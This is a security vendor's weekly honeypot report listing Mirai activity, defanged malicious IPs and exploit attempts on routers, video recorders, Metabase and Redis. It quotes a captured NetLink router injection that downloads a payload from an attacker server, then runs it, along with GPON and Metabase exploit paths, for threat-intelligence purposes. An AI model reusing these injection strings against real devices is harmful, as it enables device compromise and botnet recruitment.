CERTHoneypots

Honeypots: activity of the week 39

Analysis of the activity observed on TEHTRIS honeypot network in week 39 has revealed new indications of compromise and detected popular types of attacks.

Malicious activity of the Mirai botnet

Again this week, traces of the Mirai malware (whose activity is associated with the “Hello, world” User Agent) emanating from 346 different IP addresses have been observed.

C2 servers used in exploit attempts against MWPower

94% of the requests recorded this week on TEHTRIS honeypots were aimed at exploiting the remote Shell command execution vulnerability on MWPower video surveillance recorders, already studied last week . Wget commands refer to 19 malicious servers, 9 of which had been seen previously. The 10 new IoCs are:

IP / Domain NameCountryAS
chdestruction.cfExtension of the Central African RepublicThis domain name is associated with the Croatian IP address 45.95.169[.]145 (AS 211619 MAXKO j.d.o.o)
85.31.46[. ]179USAS 211252 Delis LLC
80.11.88[. ]106ENAS 3215 Orange
78.172.126[. ]236TRAS 9121 Turk Telekom
46.19.141[. ]122CNAS 51852 Private Layer INC
27.41.9[. ]81CNAS 17816 China Unicom IP network China169 Guangdong province
175.42.40[. ]49CNAS 4837 CHINA UNICOM China169 Backbone
118.199.171[. ]77CNAS 4808 China Unicom Beijing Province Network
110.89.10[. ]163CNAS 4134 Chinanet
103.83.110[. ]85INAS 134045 Ishan Netsol Pvt Ltd
101.0.55[. ]159INAS 133661 Netplus Broadband Services Private Limited

Exploit attempts on routers

Apart from requests targeting MWPower devices, attempts to exploit vulnerable routers have been observed, based on known vulnerabilities. For example, the following URLs attempt to exploit:

CVE-2020-8958 (CVSS3: 7.2) which allows remote code execution on vulnerable NetLink routers:

/boaform/admin/formPing?target_addr=; wget http[:]//46.19.141[.]122/netlink -O -> /tmp/jno;chmod 777 /tmp/jno;sh /tmp/jno'/& waninf=1_INTERNET_R_VID_154$

– A vulnerability in ZyXEL and Billion routers (popular in Thailand) disclosed in 2016 leading to elevation of privilege:

/cgi-bin/ViewLog.asp

CVE-2018-10561 (CVSS3: 9.8), which exploits a vulnerability on Dasan GPON routers and allows an attacker to bypass authentication by adding /images to a URL and gain control over the device

/GponForm/diag_Form?images/

It should be noted that these attempted attacks are also carried out by malicious actors other than the Mirai malware. TEHTRIS strongly recommends that you always update your devices to be protected against these kinds of known and patched vulnerabilities.

Attempt to exploit Metabase

Observed this week, 3 IP addresses of the operator DigitalOcean-ASN (AS14061) attempting to exploit versions of Metabase (an open-source data management platform) vulnerable to CVE-2021-41277 (CVSS3: 7.5), which allows an attacker to access sensitive files on the targeted server.

Request:

URL: /GponForm/diag_Form?images/
User Agent: l9explore/1.3.0

IoC:

IPCountryAS
161.35.86[. ]181NLAS 14061 DIGITALOCEAN-ASN
134.122.112[. ]12US
161.35.188[. ]242US

Malicious network activity

Out of all malicious activities on TEHTRIS honeypot network this week, 18% came from IP addresses registered in the United States, 17.21% from IP addresses registered in the Netherlands (mainly from AS AS 202425 IP Volume inc mentioned in week 37) and 15.6% from IP addresses registered in China. In addition, 9.1% came from Bulgarian IP addresses, mainly registered at AS 207812 Dm Auto Eood located in Sofia, which exists since 11/20/2019. Very little information is available about it except that its IP addresses are unfavorably known in public databases due to their suspicious activities. According to DNSlytics, this Bulgarian AS hosts 9 domains such as vip-support[.]org and freedom4ua[.]net. 4 servers are also registered including ns1.cloud[.]mobi and ns2.vip-support[.]org.

Below are the 10 most active IP addresses in attack attempts on TEHTRIS honeypots:

IP addressPercentage countASCountry
89.248.165.685.174% AS 202425 IP Volume incNL
89.248.165.974.276% AS 202425 IP Volume incNL
89.248.165.1663.981% AS 202425 IP Volume incNL
79.124.62.823.754% AS 207812 Dm Auto EoodBG
79.124.62.1303.585% AS 207812 Dm Auto EoodBG
79.124.62.783.573% AS 207812 Dm Auto EoodBG
79.124.62.863.465% AS 207812 Dm Auto EoodBG
87.246.7.1983.368% AS 204428 SS-NetBG
5.8.18.183.251% AS 202425 IP Volume incMD
89.248.165.172.949% AS 202425 IP Volume incNL

In addition, TEHTRIS paid attention to the use of non-standard ports. 13% of events on non-standard ports are TCP requests on port 6379. Port 6379 is used to exploit a vulnerability in Redis instances (database management system) and allows an unauthenticated attacker to remotely access and execute code. This is CVE-2022-20821 (CVSS3: 6.5). 70% of the activity observed on port 6379 originated from Chinese IP addresses.

TEHTRIS recommends limiting the exposure of servers using Redis by only allowing streams from legitimate users.